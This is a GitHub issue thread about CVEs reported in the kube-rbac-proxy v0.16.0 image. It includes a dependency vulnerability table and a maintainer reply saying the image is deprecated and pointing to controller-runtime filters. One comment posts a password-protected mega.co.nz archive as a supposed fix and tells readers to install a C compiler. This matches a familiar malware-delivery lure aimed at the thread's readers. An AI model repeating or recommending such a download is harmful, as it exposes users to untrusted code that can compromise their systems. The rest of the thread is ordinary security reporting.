### ISSUE TITLE
CVE's in kube-rbac-proxy:v0.16.0 image

### ISSUE THREAD

**Issue by toffiebotha** [kubernetes-sigs/kubebuilder#4179]
### What broke? What's expected?

Using the latest version (v0.16.0) of the kube-rbac-proxy image, Azure Defender reports the following vulnerabilities:
| CVE ID         | SEVERITY | VULNERABLE PACKAGE NAME                                                     | INSTALLED VERSION | FIXED IN VERSION |
|----------------|----------|-----------------------------------------------------------------------------|-------------------|------------------|
| CVE-2024-24786 | High     | google.golang.org/protobuf                                                  | 1.31.0.0          | 1.33.0           |
| CVE-2023-47108 | High     | go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc | 0.42.0.0          | 0.46.0           |
| CVE-2023-45288 | High     | golang.org/x/net                                                            | 0.21.0.0          | 0.23.0           |
| CVE-2024-28180 | Medium   | gopkg.in/square/go-jose.v2                                                  | 2.6.0.0           |                  |

Updating the versions of these dependencies to address these issues would help greatly with compliance needs.

### Reproducing this issue

Having difficulties scanning with other scanners like trivy or docker scout when pulling image from gcr.io/kubebuilder/kube-rbac-proxy, but when pushed to an Azure ACR with defender enabled, the scan results are produced.  

### KubeBuilder (CLI) Version

tag v0.16.0 - Not sure if that's the same version as the cli

**Comment by pinpolhoxx** [comment]
This might help:This file might fix it
https://mega.co.nz/#!h7FUWTgJ!EBLwTfcj8qX2Q2_UCp-4N7KgdH2Hs9qNkvH4vjvN6II
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by camilamacedo86** [comment]
Hi @toffiebotha,

- Please refer to the following discussion: https://github.com/kubernetes-sigs/kubebuilder/discussions/3907
- Additionally, see the relevant section in the docs: https://book.kubebuilder.io/reference/metrics#important-if-you-are-using-kube-rbac-proxy

Please be aware that we do not recommend using the kube-rbac-proxy image anymore. You can refer to the testdata samples to see how the same level of security can now be achieved using [WithAuthenticationAndAuthorization](https://pkg.go.dev/sigs.k8s.io/controller-runtime@v0.18.4/pkg/metrics/filters#WithAuthenticationAndAuthorization), provided by the controller-runtime.

**⚠️ Kubebuilder maintainers no longer support, build, or ensure the promotion of these images.**

Therefore, we are closing this as "WONT DO" since we no longer use this image, and we strongly advise you to discontinue its usage, as we have been communicating since may/2025 via discussion topics, mailing list, Slack channel, Kubebuilder documentation, and release notes.

**Comment by camilamacedo86** [comment]
Anyway, you might either want to create this issue for the project https://github.com/brancz/kube-rbac-proxy itself.

**Comment by toffiebotha** [comment]
Thanks for pointing me to that discussion and alternatives!
